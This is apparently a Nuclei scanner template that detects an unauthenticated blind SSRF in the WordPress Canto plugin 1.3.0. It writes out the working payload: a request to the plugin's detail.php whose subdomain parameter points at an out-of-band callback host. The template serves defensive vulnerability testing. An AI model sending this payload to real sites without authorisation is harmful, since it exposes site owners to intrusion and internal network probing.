id: wp-plugin-canto-ssrf

info:
  name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
  author: 0x_Akoko
  severity: high
  description: The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities. It allows an unauthenticated attacker to make a request to any Internal and External Server via subdomain parameter.
  reference: https://www.exploit-db.com/exploits/49189
  tags: ssrf,wordpress,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain=https://{{interactsh-url}}'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
